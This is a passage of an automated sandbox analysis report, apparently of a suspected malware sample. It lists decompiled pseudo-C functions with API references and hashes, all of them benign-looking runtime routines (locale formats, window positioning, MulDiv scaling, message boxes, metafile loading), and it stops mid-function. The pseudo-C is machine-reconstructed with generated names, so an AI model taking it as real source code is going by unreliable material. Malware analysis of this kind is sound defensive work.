                                                    0x00421524
                                                    0x00421527
                                                    0x00421538
                                                    0x0042153d
                                                    0x0042153e
                                                    0x00421543
                                                    0x00421546
                                                    0x0042154d
                                                    0x00421558
                                                    0x0042155c
                                                    0x0042155c
                                                    0x0042155c
                                                    0x0042155e
                                                    0x00421565
                                                    0x00421611
                                                    0x00421613
                                                    0x00421616
                                                    0x00421619
                                                    0x00421626
                                                    0x0042156b
                                                    0x0042160b
                                                    0x0042157a
                                                    0x00421582
                                                    0x0042158c
                                                    0x0042159c
                                                    0x004215aa
                                                    0x004215b5
                                                    0x004215ba
                                                    0x004215bd
                                                    0x004215db
                                                    0x004215de
                                                    0x004215e1
                                                    0x004215e6
                                                    0x004215eb
                                                    0x004215f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0042160b

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                    • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                      • Part of subcall function 0042146C: ResetEvent.KERNEL32(000001FC,0042150D,?,?,00000000), ref: 00421472
                                                    • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                    • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                    • String ID: 4I$LtA
                                                    • API String ID: 2189153385-4143330910
                                                    • Opcode ID: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                    • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                    • Opcode Fuzzy Hash: 9df671befd0559164bdf9a2b2f9f914a41e4678e38533ce31647a3c6e0478cce
                                                    • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(L00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = L00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                    0x0040d067
                                                    0x0040d06c
                                                    0x0040d074
                                                    0x0040d0db
                                                    0x0040d0e0
                                                    0x0040d0e4
                                                    0x0040d0ef
                                                    0x00000000
                                                    0x0040d105
                                                    0x0040d076
                                                    0x0040d080
                                                    0x0040d08f
                                                    0x0040d09f
                                                    0x0040d0b2
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                      • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                      • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                    • CharToOemA.USER32 ref: 0040D08F
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                    • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                    • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                    • LoadStringA.USER32 ref: 0040D0EF
                                                    • MessageBoxA.USER32 ref: 0040D105
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                    • String ID: LI
                                                    • API String ID: 185507032-1163166679
                                                    • Opcode ID: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                    • Opcode Fuzzy Hash: 5032c406810ebafbb8b0f00c750bd69e21efc636ecabd08e4cda58801eaa7325
                                                    • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AB98 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43ad44; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43ad3c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43ad44; // 0x0
				if(_t113 != (_t107 &  *0x43ad40)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43ad44; // 0x0
				if(_t114 != (_t107 &  *0x43ad48)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                    0x0043ab9f
                                                    0x0043aba2
                                                    0x0043aba4
                                                    0x0043aba9
                                                    0x0043ad26
                                                    0x0043ad26
                                                    0x0043ad2b
                                                    0x0043ad38
                                                    0x0043ad38
                                                    0x0043abb3
                                                    0x0043abbd
                                                    0x0043abb5
                                                    0x0043abb5
                                                    0x0043abb5
                                                    0x0043abc6
                                                    0x0043abda
                                                    0x0043abc8
                                                    0x0043abd6
                                                    0x0043abd6
                                                    0x0043abe0
                                                    0x0043abf9
                                                    0x0043abe2
                                                    0x0043abf0
                                                    0x0043abf0
                                                    0x0043ac00
                                                    0x0043ac3a
                                                    0x0043ac3d
                                                    0x0043ac08
                                                    0x0043ac0b
                                                    0x0043ac2f
                                                    0x0043ac34
                                                    0x0043ac0d
                                                    0x0043ac1e
                                                    0x0043ac20
                                                    0x0043ac20
                                                    0x0043ac0b
                                                    0x0043ac44
                                                    0x0043ac49
                                                    0x0043ac8d
                                                    0x0043ac51
                                                    0x0043ac59
                                                    0x0043ac84
                                                    0x0043ac5b
                                                    0x0043ac70
                                                    0x0043ac70
                                                    0x0043ac59
                                                    0x0043aca5
                                                    0x0043acb3
                                                    0x0043acbb
                                                    0x0043acce
                                                    0x0043acce
                                                    0x0043acdc
                                                    0x0043ace4
                                                    0x0043acf7
                                                    0x0043acf7
                                                    0x0043ad01
                                                    0x0043ad21
                                                    0x0043ad21
                                                    0x00000000

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                    • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                    • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                    • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                    • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                    • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                    0x0040e2e8
                                                    0x0040e2e8
                                                    0x0040e2e9
                                                    0x0040e2eb
                                                    0x0040e2f0
                                                    0x0040e2f0
                                                    0x0040e2f2
                                                    0x0040e2f4
                                                    0x0040e2f4
                                                    0x0040e2f7
                                                    0x0040e2fa
                                                    0x0040e2fb
                                                    0x0040e300
                                                    0x0040e303
                                                    0x0040e306
                                                    0x0040e30b
                                                    0x0040e310
                                                    0x0040e317
                                                    0x0040e319
                                                    0x0040e319
                                                    0x0040e323
                                                    0x0040e332
                                                    0x0040e33f
                                                    0x0040e354
                                                    0x0040e363
                                                    0x0040e378
                                                    0x0040e387
                                                    0x0040e39a
                                                    0x0040e3ad
                                                    0x0040e3c2
                                                    0x0040e3d1
                                                    0x0040e3e4
                                                    0x0040e3f9
                                                    0x0040e404
                                                    0x0040e411
                                                    0x0040e426
                                                    0x0040e431
                                                    0x0040e43e
                                                    0x0040e451
                                                    0x0040e466
                                                    0x0040e473
                                                    0x0040e488
                                                    0x0040e495
                                                    0x0040e49d
                                                    0x0040e4a5
                                                    0x0040e4ba
                                                    0x0040e4c4
                                                    0x0040e4c9
                                                    0x0040e4cb
                                                    0x0040e4e4
                                                    0x0040e4cd
                                                    0x0040e4d5
                                                    0x0040e4d5
                                                    0x0040e4f9
                                                    0x0040e503
                                                    0x0040e508
                                                    0x0040e50a
                                                    0x0040e51c
                                                    0x0040e52d
                                                    0x0040e546
                                                    0x0040e52f
                                                    0x0040e537
                                                    0x0040e537
                                                    0x0040e52d
                                                    0x0040e54b
                                                    0x0040e54e
                                                    0x0040e551
                                                    0x0040e556
                                                    0x0040e563
                                                    0x0040e568
                                                    0x0040e56b
                                                    0x0040e56e
                                                    0x0040e573
                                                    0x0040e580
                                                    0x0040e593
                                                    0x0040e59a
                                                    0x0040e59d
                                                    0x0040e5a0
                                                    0x0040e5b2

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                    • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                    • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004388F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t114 = E00438D40(_a4 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x49dbcc; // 0x49ebb8
				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E00441704(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t107 =  *0x437498; // 0x4374e4
						__eflags = L00403D78( *_t19, _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00441704( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E00438884,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						L00403DE8(_t102, _t127);
						_t79 =  *0x49eb38; // 0x0
						_t111 =  *0x4360a0; // 0x4360ec
						if(L00403D78(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x49eb38; // 0x0
						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E00441704(_t117);
					goto L19;
				}
				_t118 = L00437E5C(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E00441704(_t118);
					goto L6;
				}
			}































                                                    0x004388f0
                                                    0x004388f9
                                                    0x004388fb
                                                    0x0043890a
                                                    0x0043890c
                                                    0x00438912
                                                    0x00438917
                                                    0x00438922
                                                    0x0043894b
                                                    0x0043894f
                                                    0x00438a7e
                                                    0x00438a87
                                                    0x00438a87
                                                    0x00438955
                                                    0x0043895b
                                                    0x0043895b
                                                    0x00438960
                                                    0x00000000
                                                    0x00000000
                                                    0x00438959
                                                    0x00438959
                                                    0x00438969
                                                    0x0043896b
                                                    0x00438971
                                                    0x00000000
                                                    0x00000000
                                                    0x0043897a
                                                    0x0043897d
                                                    0x00438982
                                                    0x004389a3
                                                    0x004389a6
                                                    0x004389b1
                                                    0x004389b3
                                                    0x004389c5
                                                    0x004389c7
                                                    0x004389b5
                                                    0x004389b8
                                                    0x004389c0
                                                    0x004389c0
                                                    0x004389ca
                                                    0x004389ca
                                                    0x004389ce
                                                    0x004389d4
                                                    0x004389da
                                                    0x004389ec
                                                    0x004389f1
                                                    0x004389f5
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a03
                                                    0x00438a0e
                                                    0x00438a13
                                                    0x00438a23
                                                    0x00438a28
                                                    0x00438a2d
                                                    0x00438a3a
                                                    0x00438a65
                                                    0x00438a78
                                                    0x00438a7a
                                                    0x00438a7a
                                                    0x00000000
                                                    0x00438a78
                                                    0x00438a3c
                                                    0x00438a4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a4d
                                                    0x00438a63
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00438a63
                                                    0x00438987
                                                    0x0043898d
                                                    0x0043898d
                                                    0x00438992
                                                    0x00000000
                                                    0x00000000
                                                    0x0043898b
                                                    0x0043898b
                                                    0x0043899b
                                                    0x00000000
                                                    0x0043899b
                                                    0x0043892c
                                                    0x00438930
                                                    0x00000000
                                                    0x00438936
                                                    0x0043893a
                                                    0x0043893a
                                                    0x0043893f
                                                    0x00000000
                                                    0x00000000
                                                    0x00438938
                                                    0x00438938
                                                    0x00438948
                                                    0x00000000
                                                    0x00438948

                                                    APIs
                                                      • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                      • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                    • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                    • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                    • EnumThreadWindows.USER32(00000000,00438884,?), ref: 004389EC
                                                    • GetWindowRect.USER32 ref: 00438A03
                                                    • IntersectRect.USER32 ref: 00438A71
                                                      • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                      • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                      • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                      • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                    • String ID: `C$tC
                                                    • API String ID: 2202917067-2788972245
                                                    • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                    • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                    • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A8A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetActiveWindow.USER32 ref: 0045A8B7
                                                    • GetWindowRect.USER32 ref: 0045A911
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                    • MessageBoxA.USER32 ref: 0045A98A
                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                    • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Active$MessageRect
                                                    • String ID: (
                                                    • API String ID: 3147912190-3887548279
                                                    • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                    • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                    • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042819C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
					L00425F58();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040275C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
